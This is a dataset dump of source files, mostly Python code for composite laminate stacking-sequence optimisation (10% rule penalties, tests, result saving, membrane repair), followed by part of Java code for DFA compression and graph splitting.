n_plies_per_angle[constraints.index0]/n_total\r\n percent_45 = n_plies_per_angle[constraints.index45]/n_total\r\n percent_90 = n_plies_per_angle[constraints.index90]/n_total\r\n percent_135 = n_plies_per_angle[constraints.index135]/n_total\r\n return cummul_areas * (\r\n max(0, constraints.percent_0 - percent_0)\r\n + max(0, constraints.percent_45 - percent_45)\r\n + max(0, constraints.percent_90 - percent_90)\r\n + max(0, constraints.percent_135 - percent_135)\r\n + max(0, constraints.percent_45_135 \\\r\n - percent_45 - percent_135))\r\n\r\n penalties = np.zeros((n_plies_per_angle.shape[0],))\r\n for ind_ss in range(n_plies_per_angle.shape[0]):\r\n n_total = sum(n_plies_per_angle[ind_ss])\r\n if n_total:\r\n percent_0 = n_plies_per_angle[\r\n ind_ss][constraints.index0]/n_total\r\n percent_45 = n_plies_per_angle[\r\n ind_ss][constraints.index45]/n_total\r\n percent_90 = n_plies_per_angle[\r\n ind_ss][constraints.index90]/n_total\r\n percent_135 = n_plies_per_angle[\r\n ind_ss][constraints.index135]/n_total\r\n penalties[ind_ss] = (\r\n max(0, constraints.percent_0 - percent_0)\r\n + max(0, constraints.percent_45 - percent_45)\r\n + max(0, constraints.percent_90 - percent_90)\r\n + max(0, constraints.percent_135 - percent_135)\r\n + max(0, constraints.percent_45_135 \\\r\n - percent_45 - percent_135))\r\n return cummul_areas * penalties\r\n\r\n if (isinstance(n_plies_per_angle, np.ndarray) \\\r\n and n_plies_per_angle.ndim == 1) \\\r\n or isinstance(n_plies_per_angle, list):\r\n return 0\r\n return np.zeros((n_plies_per_angle.shape[0],))\r\n\r\n\r\ndef calc_n_plies_per_angle(\r\n n_plies_per_angle_ini, constraints, middle_ply, angle, angle2=None):\r\n '''\r\n returns the ply counts in each fibre direction\r\n\r\n INPUTS\r\n - angle: the sublaminate stacking sequences\r\n - angle2: the second sublaminate stacking sequences\r\n - n_plies_per_angle_ini: number of initials plies per fibre\r\n orientation in the same order indicated in constraints.set_of_angles\r\n - constraints.rule_10_percent = True implies the 10% rule is active\r\n '''\r\n if angle.ndim == 1:\r\n angle = angle.reshape((1, angle.size))\r\n size_ss = angle.shape[0]\r\n n_plies_per_angle_tab = np.matlib.repmat(n_plies_per_angle_ini, size_ss, 1)\r\n if angle2 is None: # For S or U laminates\r\n for ind_ss in np.arange(size_ss)[::-1]:\r\n n_plies_per_angle = np.copy(n_plies_per_angle_ini)\r\n for ind_ply in range(angle.shape[1]):\r\n index = constraints.ind_angles_dict[angle[ind_ss, ind_ply]]\r\n n_plies_per_angle[index] += 1\r\n if middle_ply != 0:\r\n index = constraints.ind_angles_dict[angle[ind_ss, -1]]\r\n n_plies_per_angle[index] -= 1/2\r\n n_plies_per_angle_tab[ind_ss] = n_plies_per_angle\r\n else:\r\n for ind_ss in np.arange(size_ss)[::-1]:\r\n n_plies_per_angle = np.copy(n_plies_per_angle_ini)\r\n for ind_ply in range(angle.shape[1]):\r\n index = constraints.ind_angles_dict[angle[ind_ss, ind_ply]]\r\n n_plies_per_angle[index] += 1\r\n for ind_ply in range(angle2.shape[1]):\r\n index = constraints.ind_angles_dict[angle2[ind_ss, ind_ply]]\r\n n_plies_per_angle[index] += 1\r\n if middle_ply != 0:\r\n index = constraints.ind_angles_dict[angle[ind_ss, -1]]\r\n n_plies_per_angle[index] -= 1/2\r\n n_plies_per_angle_tab[ind_ss] = n_plies_per_angle\r\n return n_plies_per_angle_tab\r\n\r\n\r\nif __name__ == \"__main__\":\r\n constraints = Constraints(\r\n sym=True,\r\n rule_10_percent=True,\r\n percent_0=10,\r\n percent_45=10,\r\n percent_90=10,\r\n percent_135=10)\r\n\r\n print('*** Test for the function display_ply_counts ***\\n')\r\n display_ply_counts(stack=np.array([\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 45, 90, 90, 90, 90, 90, 90, -45, -45, -45, -45, -45, -45, -45, -45, -45, -45, 90, 90, 90, 90, 90, 90, 45, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], int), constraints=constraints)\r\n\r\n\r\n print('\\n*** Test for the function calc_penalty_10_ss ***\\n')\r\n ss = [0, 45, 45, 90, -45]\r\n print(calc_penalty_10_ss(ss, constraints))\r\n\r\n print('\\n*** Test for the function calc_penalty_10_pc ***\\n')\r\n n_plies_per_angle = [0, 0, 0, 0, 0, 10]\r\n print(calc_penalty_10_pc(n_plies_per_angle, constraints))\r\n\r\n\r\n print('\\n*** Test for the function calc_n_plies_per_angle ***\\n')\r\n middle_ply = 0\r\n n_plies_per_angle = np.array([0., 0., 0., 0.])\r\n ss = np.array([[45, -45, 0, 45, 90],\r\n [45, 90, 45, 45, 45],\r\n [0, 45, 45, 45, 90],\r\n [90, 45, 45, 45, 0],\r\n [45, 45, 45, 90, 45],\r\n [45, 45, 0, -45, 45]])\r\n print('Input stacking sequences:\\n')\r\n print_list_ss(ss)\r\n n_plies_per_angle = calc_n_plies_per_angle(\r\n n_plies_per_angle, constraints, middle_ply, ss)\r\n print('ply counts', n_plies_per_angle)\r\n\r\n\r\n constraints = Constraints(\r\n sym=True,\r\n rule_10_percent=True,\r\n rule_10_Abdalla=True,\r\n percent_Abdalla=10)\r\n\r\n print('\\n*** Test for the function calc_penalty_10_ss ***\\n')\r\n ss = [0, 45, 45, 90, -45]\r\n print(calc_penalty_10_ss(ss, constraints, LPs=[\r\n 4.08931640e-01, -1.00000000e-01, 0.00000000e+00, 1.46895913e-18,\r\n 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, -7.89491929e-18,\r\n 2.44936031e-01, -4.72222222e-02, -5.38750716e-02, 6.54330305e-03]))\r\n\r\n print(calc_penalty_10_ss(ss, constraints, mp=True, LPs=np.array([[\r\n 4.08931640e-01, -1.00000000e-01, 0.00000000e+00, 1.46895913e-18,\r\n 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, -7.89491929e-18,\r\n 2.44936031e-01, -4.72222222e-02, -5.38750716e-02, 6.54330305e-03],\r\n [4.08931640e-01, -1.00000000e-01, 0.00000000e+00, 1.46895913e-18,\r\n 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, -7.89491929e-18,\r\n 2.44936031e-01, -4.72222222e-02, -5.38750716e-02, 6.54330305e-03]])))\r\n\r\n"
},
{
"alpha_fraction": 0.5572705268859863,
"alphanum_fraction": 0.6092607378959656,
"avg_line_length": 36.40625,
"blob_id": "fe1a1fef2ef65ea20ff457dfbed64df648d47ba9",
"content_id": "08e1307c6d42f8c424756ee32a392dcf2b54d53c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2462,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 64,
"path": "/src/guidelines/test_10_percent_rule.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# - * - coding: utf - 8 - * -\r\n\"\"\"\r\nThis module test the functions for the 10% rule.\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\nimport math as ma\r\nimport pytest\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.guidelines.ten_percent_rule import is_ten_percent_rule\r\nfrom src.guidelines.ten_percent_rule_Abdalla import calc_distance_2_points\r\nfrom src.guidelines.ten_percent_rule_Abdalla import calc_distance_Abdalla\r\n\r\[email protected](\r\n \"\"\"constraints, stack, ply_queue, n_plies_per_angle, equality_45_135,\r\nequality_0_90, expect\"\"\", [\r\n (Constraints(rule_10_percent=True, percent_0=50),\r\n np.array([0, 45, 90], int), [], None, False, False, False),\r\n (Constraints(rule_10_percent=True, percent_0=50),\r\n np.array([0, 45, 90], int), None, None, False, False, False),\r\n (Constraints(rule_10_percent=True, percent_0=50),\r\n np.array([0, 666, 666], int), [0, 45], None, False, False, True),\r\n (Constraints(rule_10_percent=True, percent_0=50),\r\n None, None, np.array([3, 0, 3, 0]), False, False, False),\r\n (Constraints(rule_10_percent=True, percent_0=50),\r\n None, None, np.array([0, 3, 0, 3]), False, False, True)\r\n ])\r\n\r\ndef test_is_ten_percent_rule(\r\n constraints, stack, ply_queue, n_plies_per_angle, equality_45_135,\r\n equality_0_90, expect):\r\n output = is_ten_percent_rule(\r\n constraints, stack, ply_queue, n_plies_per_angle, equality_45_135,\r\n equality_0_90)\r\n assert output == expect\r\n\r\[email protected](\r\n \"\"\"point1, point2, expect\"\"\", [\r\n (np.array([0, 0]), np.array([0, 0]), 0),\r\n (np.array([0, 0]), np.array([0, 2]), 2),\r\n (np.array([0, 0]), np.array([1, 1]), ma.sqrt(2)),\r\n ])\r\n\r\ndef test_calc_distance_2_points(point1, point2, expect):\r\n output = calc_distance_2_points(point1, point2)\r\n assert output == expect\r\n\r\n\r\[email protected](\r\n \"\"\"LPs, constraints, expect\"\"\", [\r\n (np.array([0, 0]), Constraints(rule_10_percent=True,\r\n rule_10_Abdalla=True, percent_Abdalla=10), 0),\r\n (np.array([0, 0.7]), Constraints(rule_10_percent=True,\r\n rule_10_Abdalla=True, percent_Abdalla=10), 0.1),\r\n ])\r\n\r\ndef test_calc_distance_Abdalla(LPs, constraints, expect):\r\n output = calc_distance_Abdalla(LPs, constraints)\r\n assert abs(output - expect) < 1e-5\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5491710305213928,
"alphanum_fraction": 0.5613218545913696,
"avg_line_length": 37.137779235839844,
"blob_id": "34ad8ba6fe493dbc6d10d543b3fd92072faf6889",
"content_id": "5bb058a5a11343fe267b9c5315a55d1b4466b3c8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8806,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 225,
"path": "/src/BELLA/save_result.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunction to save the results of multi-panel optimisations\r\n\r\n- save_result_BELLAs\r\n saves the results for the design of a multipanel structure\r\n\r\n- save_result_BELLA_one_pdl\r\n saves the results at one iteration of the design of a multipanel\r\n structure\r\n\"\"\"\r\nimport sys\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.divers.excel import append_df_to_excel\r\nfrom src.buckling.buckling import buckling_factor\r\nfrom src.guidelines.ipo_oopo import calc_penalty_ipo_oopo_mp\r\nfrom src.guidelines.contiguity import calc_penalty_contig_mp\r\nfrom src.guidelines.disorientation import calc_number_violations_diso_mp\r\nfrom src.guidelines.ten_percent_rule import calc_penalty_10_ss\r\nfrom src.CLA.lampam_functions import calc_lampam\r\nfrom src.CLA.ABD import D_from_lampam\r\n\r\ndef save_result_BELLAs(filename, multipanel, constraints, parameters,\r\n obj_func_param, pdl, output, mat=None, only_best=False):\r\n \"\"\"\r\n saves the results for the design of a multipanel structure\r\n \"\"\"\r\n if only_best:\r\n table_res = pd.DataFrame()\r\n if hasattr(output, 'time'):\r\n table_res.loc[0, 'time (s)'] = output.time\r\n table_res = save_result_BELLA_one_pdl(\r\n table_res,\r\n multipanel,\r\n constraints,\r\n parameters,\r\n obj_func_param,\r\n output,\r\n None,\r\n 0,\r\n mat)\r\n append_df_to_excel(\r\n filename, table_res, 'Best Result', index=False, header=True)\r\n return 0\r\n\r\n\r\n for ind in range(parameters.n_ini_ply_drops):\r\n table_res = pd.DataFrame()\r\n table_res = save_result_BELLA_one_pdl(\r\n table_res,\r\n multipanel,\r\n constraints,\r\n parameters,\r\n obj_func_param,\r\n output,\r\n pdl[ind],\r\n ind,\r\n mat)\r\n append_df_to_excel(\r\n filename, table_res, 'Results', index=False, header=True)\r\n # to save best result\r\n table_res = pd.DataFrame()\r\n table_res.loc[0, 'time (s)'] = output.time\r\n table_res = save_result_BELLA_one_pdl(\r\n table_res,\r\n multipanel,\r\n constraints,\r\n parameters,\r\n obj_func_param,\r\n output,\r\n pdl[output.ind_mini],\r\n 0,\r\n mat)\r\n append_df_to_excel(\r\n filename, table_res, 'Best Result', index=False, header=True)\r\n return 0\r\n\r\ndef save_result_BELLA_one_pdl(\r\n table_res, multipanel, constraints, parameters, obj_func_param,\r\n output, pdl=None, ind=0, mat=None):\r\n \"\"\"\r\n saves the results at one iteration of the design of a multipanel\r\n structure\r\n \"\"\"\r\n\r\n if parameters is None:\r\n if multipanel.panels[0].N_x == 0 and multipanel.panels[0].N_y == 0:\r\n save_buckling = False\r\n else:\r\n save_buckling = True\r\n else:\r\n save_buckling = parameters.save_buckling\r\n\r\n if hasattr(output, 'obj_constraints'):\r\n table_res.loc[ind, 'obj_constraints'] \\\r\n = output.obj_constraints_tab[ind]\r\n if hasattr(output, 'n_obj_func_calls_tab'):\r\n table_res.loc[ind, 'n_obj_func_calls'] \\\r\n = output.n_obj_func_calls_tab[ind]\r\n # table_res.loc[ind, 'n_designs_last_level'] \\\r\n # = output.n_designs_last_level_tab[ind]\r\n # table_res.loc[ind, 'n_designs_after_ss_ref_repair'] \\\r\n # = output.n_designs_after_ss_ref_repair_tab[ind]\r\n # table_res.loc[ind, 'n_designs_after_thick_to_thin'] \\\r\n # = output.n_designs_after_thick_to_thin_tab[ind]\r\n # table_res.loc[ind, 'n_designs_after_thin_to_thick'] \\\r\n # = output.n_designs_after_thin_to_thick_tab[ind]\r\n # table_res.loc[ind, 'n_designs_repaired_unique'] \\\r\n # = output.n_designs_repaired_unique_tab[ind]\r\n\r\n table_res.loc[ind, 'penalty_spacing'] = output.penalty_spacing_tab[ind]\r\n\r\n ss = output.ss\r\n\r\n norm_diso_contig = np.array(\r\n [panel.n_plies for panel in multipanel.panels])\r\n\r\n n_diso = calc_number_violations_diso_mp(ss, constraints)\r\n penalty_diso = np.zeros((multipanel.n_panels,))\r\n if constraints.diso and n_diso.any():\r\n penalty_diso = n_diso / norm_diso_contig\r\n else:\r\n penalty_diso = np.zeros((multipanel.n_panels,))\r\n\r\n n_contig = calc_penalty_contig_mp(ss, constraints)\r\n penalty_contig = np.zeros((multipanel.n_panels,))\r\n if constraints.contig and n_contig.any():\r\n penalty_contig = n_contig / norm_diso_contig\r\n else:\r\n penalty_contig = np.zeros((multipanel.n_panels,))\r\n\r\n lampam = np.array([calc_lampam(ss[ind_panel]) \\\r\n for ind_panel in range(multipanel.n_panels)])\r\n \r\n penalty_10 = np.zeros((multipanel.n_panels,))\r\n if constraints.rule_10_percent and constraints.rule_10_Abdalla:\r\n penalty_10 = calc_penalty_10_ss(ss, constraints, lampam, mp=True)\r\n else:\r\n penalty_10 = calc_penalty_10_ss(ss, constraints, LPs=None, mp=True)\r\n\r\n penalty_bal_ipo, penalty_oopo = calc_penalty_ipo_oopo_mp(\r\n lampam, constraints)\r\n\r\n for ind_p, panel in enumerate(multipanel.panels):\r\n\r\n table_res.loc[ind + ind_p, 'index panel'] = ind_p + 1\r\n table_res.loc[ind + ind_p, 'n_plies'] = panel.n_plies\r\n if hasattr(output, 'obj_no_constraints'):\r\n table_res.loc[ind + ind_p, 'obj_no_constraints'] \\\r\n = output.obj_no_constraints_tab[ind][ind_p]\r\n table_res.loc[ind + ind_p, 'n_violations_diso'] = n_diso[ind_p]\r\n table_res.loc[ind + ind_p, 'n_violations_contig'] = n_contig[ind_p]\r\n table_res.loc[ind + ind_p, 'ipo: |lampam[3]| + |lampam[4]|'] \\\r\n = abs(lampam[ind_p, 2]) + abs(lampam[ind_p, 3])\r\n table_res.loc[ind + ind_p, 'oopo: |lampam[11]| + |lampam[12]|'] \\\r\n = abs(lampam[ind_p, 10]) + abs(lampam[ind_p, 11])\r\n table_res.loc[ind + ind_p, 'percentage_0_plies'] \\\r\n = sum(output.sst[ind_p] == 0) / (output.sst[ind_p].size)\r\n table_res.loc[ind + ind_p, 'percentage_90_plies'] \\\r\n = sum(output.sst[ind_p] == 90) / (output.sst[ind_p].size)\r\n table_res.loc[ind + ind_p, 'percentage_+45_plies'] \\\r\n = sum(output.sst[ind_p] == 45) / (output.sst[ind_p].size)\r\n table_res.loc[ind + ind_p, 'percentage_-45_plies'] \\\r\n = sum(output.sst[ind_p] == -45) / (output.sst[ind_p].size)\r\n table_res.loc[ind + ind_p, 'percentage_+-45_plies'] \\\r\n = (sum(output.sst[ind_p] == 45) + sum(output.sst[ind_p] == -45)) \\\r\n / (output.sst[ind_p].size)\r\n\r\n table_res.loc[ind + ind_p, 'penalty_diso'] = penalty_diso[ind_p]\r\n table_res.loc[ind + ind_p, 'penalty_contig'] = penalty_contig[ind_p]\r\n table_res.loc[ind + ind_p, 'penalty_10'] = penalty_10[ind_p]\r\n table_res.loc[ind + ind_p, 'penalty_ipo'] = penalty_bal_ipo[ind_p]\r\n table_res.loc[ind + ind_p, 'penalty_oopo'] = penalty_oopo[ind_p]\r\n\r\n if save_buckling:\r\n table_res.loc[ind + ind_p, 'n_plies_'] = panel.n_plies\r\n table_res.loc[ind + ind_p, 'lambda buckling'] = buckling_factor(\r\n lampam=lampam[ind_p],\r\n mat=mat,\r\n n_plies=output.ss[ind_p].size,\r\n N_x=panel.N_x,\r\n N_y=panel.N_y,\r\n length_x=panel.length_x,\r\n length_y=panel.length_y,\r\n n_modes=10)\r\n\r\n for angle in constraints.set_of_angles:\r\n table_res.loc[ind + ind_p, 'n_' + str(angle) + 'plies'] \\\r\n = sum(output.sst[ind_p] == angle)\r\n\r\n for ind_lp in range(12):\r\n table_res.loc[\r\n ind + ind_p, 'lampam_error[' + str(ind_lp + 1) + ']'] = \\\r\n abs(panel.lampam_target[ind_lp] - lampam[ind_p, ind_lp])\r\n\r\n for ind_lp in range(12):\r\n table_res.loc[\r\n ind + ind_p, 'lampam[' + str(ind_lp + 1) + ']'] = \\\r\n lampam[ind_p, ind_lp]\r\n \r\n D = D_from_lampam(lampam[ind_p], mat) \r\n D_11 = D[0, 0]\r\n D_22 = D[1, 1]\r\n D_16 = D[0, 2]\r\n D_26 = D[1, 2]\r\n \r\n table_res.loc[ind + ind_p, 'gamma'] = abs(D_16/(( (D_11**3) * D_22 )**(1/4)))\r\n table_res.loc[ind + ind_p, 'delta'] = abs(D_26/(( (D_22**3) * D_11 )**(1/4)))\r\n \r\n stack = ' '.join(np.array(output.sst[ind_p], dtype=str))\r\n table_res.loc[\r\n ind + ind_p, 'stacking sequences with ply drops included'] = stack\r\n\r\n stack = ' '.join(np.array(output.ss[ind_p], dtype=str))\r\n table_res.loc[ind + ind_p, 'stacking sequences'] = stack\r\n\r\n if pdl is not None:\r\n stack = ' '.join(np.array(pdl[ind_p]).astype(str))\r\n table_res.loc[ ind + ind_p, 'initial ply drop layout'] = stack\r\n \r\n\r\n return table_res\r\n"
},
{
"alpha_fraction": 0.6121515035629272,
"alphanum_fraction": 0.6188098192214966,
"avg_line_length": 37.3934440612793,
"blob_id": "d510ae202ed79f6f3b1785464b6b87be6b5e5a09",
"content_id": "93e71efc6626df1cc82e21c4fe5fe715e5b95e5a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2403,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 61,
"path": "/src/LAYLA_V02/results.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nClass for the results of an optimisation with LAYLA\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport numpy as np\r\n\r\n#import sys\r\n#sys.path.append(r'C:\\BELLA_and_LAYLA')\r\n#from src.divers.pretty_print import print_lampam, print_ss, print_list_ss\r\n\r\nclass LAYLA_Results():\r\n \" An object for storing the results of an optimisation with LAYLA\"\r\n def __init__(self, parameters, targets):\r\n \"Initialise the results of an optimisation with LAYLA\"\r\n self.completed = False\r\n # solution stacking sequence\r\n self.ss_best = None\r\n # solution lamination parameters\r\n self.lampam_best = None\r\n # solution objective\r\n self.objective = None\r\n # stacking sequence solutions at each outer step\r\n self.ss_tab = np.zeros((\r\n parameters.n_outer_step, targets.n_plies), int)\r\n # solution lamination parameters at each outer step\r\n self.lampam_tab_tab = np.zeros((\r\n parameters.n_outer_step, 12), float)\r\n # solution objectives at each outer step\r\n self.obj_tab = np.NaN*np.ones((\r\n parameters.n_outer_step,), float)\r\n# # number of objective function evaluations at each outer step\r\n# self.n_obj_func_calls_tab = np.NaN*np.ones((\r\n# parameters.n_outer_step,), int)\r\n # numbers of stacks at the last level of the last group search\r\n self.n_designs_last_level_tab = np.NaN*np.ones((\r\n parameters.n_outer_step,), int)\r\n # numbers of repaired stacks at the last level of the last group search\r\n self.n_designs_repaired_tab = np.NaN*np.ones((\r\n parameters.n_outer_step,), int)\r\n # numbers of unique repaired stacks at the last group search\r\n self.n_designs_repaired_unique_tab = np.NaN*np.ones((\r\n parameters.n_outer_step,), int)\r\n # numbers of outer steps performed\r\n self.number_of_outer_steps_performed = None\r\n # number of the outer step that finds the best solution\r\n self.n_outer_step_best_solution = None\r\n\r\n def __repr__(self):\r\n \" Display object \"\r\n\r\n return f'''\r\nResults with LAYLA:\r\n\r\n Stacking sequence: {self.ss_best}\r\n Lamination parameters 1-4: {self.lampam_best[:4]}\r\n Lamination parameters 5-8: {self.lampam_best[4:8]}\r\n Lamination parameters 9-12: {self.lampam_best[8:]}\r\n'''\r\n"
},
{
"alpha_fraction": 0.6113550662994385,
"alphanum_fraction": 0.6257842183113098,
"avg_line_length": 36.878047943115234,
"blob_id": "b8d950e8970afc92659c1c3ff7459ab62ab1199b",
"content_id": "2a3dd57d85de95054e5599fb7ca7d62a2637cd6f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3188,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 82,
"path": "/src/RELAY/repair_membrane.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nrepair for membrane properties\r\n\r\n- repair_membrane\r\n repairs a laminate to improve its in-plane stiffness properties\r\n\r\n- repair_membrane_1:\r\n repair for membrane properties only accounting for one panel\r\n\r\n- repair_membrane_2:\r\n repair for membrane properties accounting for all the panels\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.RELAY.repair_membrane_1_ipo import repair_membrane_1_ipo\r\nfrom src.RELAY.repair_membrane_1_no_ipo import repair_membrane_1_no_ipo\r\nfrom src.RELAY.repair_membrane_1_ipo_Abdalla import repair_membrane_1_ipo_Abdalla\r\nfrom src.RELAY.repair_membrane_1_no_ipo_Abdalla \\\r\nimport repair_membrane_1_no_ipo_Abdalla\r\nfrom src.RELAY.repair_10_bal import calc_lampamA_ply_queue\r\n\r\ndef repair_membrane(\r\n ss, ply_queue, mini_10, in_plane_coeffs, constraints, parameters,\r\n obj_func_param=None, multipanel=None, lampam_target=None):\r\n \"\"\"\r\n repairs a laminate to improve its in-plane stiffness properties\r\n \"\"\"\r\n if not multipanel is None:\r\n if not parameters.repair_membrane_switch \\\r\n or np.isclose(np.array([0, 0, 0, 0], float), in_plane_coeffs).all():\r\n ss_list = [ss] # no in-plane optimisation required\r\n ply_queue_list = [ply_queue]\r\n lampamA_list = [\r\n calc_lampamA_ply_queue(ss, ss.size, ply_queue, constraints)]\r\n else:\r\n ss_list, ply_queue_list, lampamA_list, _ = repair_membrane_1(\r\n ss, ply_queue, mini_10,\r\n in_plane_coeffs, parameters.p_A,\r\n lampam_target, constraints)\r\n return ss_list, ply_queue_list, lampamA_list\r\n\r\n if not parameters.repair_membrane_switch \\\r\n or np.isclose(np.array([0, 0, 0, 0], float), in_plane_coeffs).all():\r\n ss_list = [ss] # no in-plane optimisation required\r\n ply_queue_list = [ply_queue]\r\n lampamA_list = [\r\n calc_lampamA_ply_queue(ss, ss.size, ply_queue, constraints)]\r\n else:\r\n ss_list, ply_queue_list, lampamA_list, _ = repair_membrane_1(\r\n ss, ply_queue, mini_10,\r\n in_plane_coeffs, parameters.p_A,\r\n lampam_target, constraints)\r\n return ss_list, ply_queue_list, lampamA_list\r\n\r\n\r\ndef repair_membrane_1(\r\n ss, ply_queue, mini_10, in_plane_coeffs,\r\n p_A, lampam_target, constraints):\r\n \"\"\"\r\n repair for membrane properties only accounting for one panel\r\n \"\"\"\r\n if constraints.rule_10_percent and constraints.rule_10_Abdalla:\r\n if constraints.ipo:\r\n return repair_membrane_1_ipo_Abdalla(\r\n ss, ply_queue, in_plane_coeffs, p_A, lampam_target,\r\n constraints)\r\n return repair_membrane_1_no_ipo_Abdalla(\r\n ss, ply_queue, in_plane_coeffs, p_A, lampam_target, constraints)\r\n\r\n if constraints.ipo:\r\n return repair_membrane_1_ipo(\r\n ss, ply_queue, mini_10, in_plane_coeffs,\r\n p_A, lampam_target, constraints)\r\n return repair_membrane_1_no_ipo(\r\n ss, ply_queue, mini_10, in_plane_coeffs,\r\n p_A, lampam_target, constraints)\r\n"
}
] | 67 |
notantony/dpi-fp
|
https://github.com/notantony/dpi-fp
|
9f185870ce8a18e7149b70d593d938e57fcb810e
|
e099fde11aaaddad1e394dc3be27a67f8fc2bf1d
|
26a3ca6eac91ac5dbedc36b8c92a56db148a73aa
|
refs/heads/master
| 2023-01-23T15:57:30.805714 | 2020-11-18T17:15:47 | 2020-11-18T17:15:47 | 279,149,964 | 0 | 0 | null | 2020-07-12T21:20:54 | 2020-10-28T09:00:06 | 2020-10-28T09:00:29 |
Java
|
[
{
"alpha_fraction": 0.360883504152298,
"alphanum_fraction": 0.3619522750377655,
"avg_line_length": 39.68115997314453,
"blob_id": "0ec37fd39e875f7c0865c7b28b7b1b72371def05",
"content_id": "9136c31816d7d7e73efb60c6f63f8d9d2c95075f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 2807,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 69,
"path": "/src/main/java/automaton/algo/compressor/heuristic/DfaCompressorOld.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package automaton.algo.compressor.heuristic;\n\nimport automaton.dfa.Dfa;\nimport automaton.dfa.Node;\nimport automaton.transition.Transitions;\n\nimport java.util.ArrayList;\nimport java.util.HashMap;\nimport java.util.List;\nimport java.util.Map;\n\npublic class DfaCompressorOld {\n public void compress(Dfa dfa) {\n boolean found = true;\n while (found) {\n found = false;\n List<Node> nodes = new ArrayList<>(dfa.allNodes());\n for (int i = 0; !found && i < nodes.size(); i++) {\n Node a = nodes.get(i);\n if (a.isTerminal()) {\n continue;\n }\n Map<Character, Node> aEdges = a.getEdges();\n for (int j = 0; !found && j < i; j++) {\n Node b = nodes.get(j);\n if (b.isTerminal()) {\n continue;\n }\n Map<Character, Node> bEdges = b.getEdges();\n boolean failed = false;\n for (char c = 0; c <= Transitions.MAX_CHAR; c++) {\n if (aEdges.containsKey(c) && bEdges.containsKey(c) &&\n aEdges.get(c) != bEdges.get(c)) {\n failed = true;\n }\n }\n if (!failed) {\n System.out.println(\"fix: \" + a.hashCode() + \" \" + b.hashCode());\n found = true;\n Node newNode = new Node();\n aEdges.forEach((c, target) -> {\n newNode.addEdge(c, (target == a || target == b) ? newNode : target);\n });\n bEdges.forEach((c, target) -> {\n newNode.addEdge(c, (target == a || target == b) ? newNode : target);\n });\n for (Node node: nodes) {\n if (node == a || node == b) {\n continue;\n }\n Map<Character, Node> updated = new HashMap<>();\n node.getEdges().forEach((c, target) -> {\n if (target == a || target == b) {\n updated.put(c, newNode);\n } else {\n updated.put(c, target);\n }\n });\n node.setEdges(updated);\n }\n if (dfa.getStart() == a || dfa.getStart() == b) {\n dfa.setStart(newNode);\n }\n }\n }\n }\n }\n }\n}\n"
},
{
"alpha_fraction": 0.4931289553642273,
"alphanum_fraction": 0.4976215660572052,
"avg_line_length": 36.84000015258789,
"blob_id": "d9a9f2c90ccb20b58360cf3303f9dd398c6c29af",
"content_id": "93e24a921120067a0727fbe0a2158f938ee95ddd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 3784,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 100,
"path": "/src/main/java/intgraph/GreedySplitter.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package intgraph;\n\nimport java.util.*;\nimport java.util.stream.Collectors;\n\npublic class GreedySplitter {\n private List<List<Integer>> result = new ArrayList<>();\n private List<List<Integer>> lastSets = new ArrayList<>();\n private HashSet<IntGraph.IntNode> curNodes;\n\n public List<List<Integer>> split(IntGraph graph) {\n curNodes = new HashSet<>(graph.nodes);\n int sum = 0;\n while (sum < graph.nodes.size()) {\n List<Integer> group = splitIter(graph);\n curNodes.removeAll(group.stream().map(a -> graph.nodes.get(a)).collect(Collectors.toList()));\n sum += group.size();\n result.add(group);\n// Logger.getGlobal().info(\"Added group\");\n }\n\n return result;\n }\n\n public List<Integer> splitIter(IntGraph graph) {\n HashMap<Integer, Integer> penalty = new HashMap<>();\n\n PriorityQueue<IntGraph.IntNode> queue = new PriorityQueue<>(20, new Comparator<IntGraph.IntNode>() {\n @Override\n public int 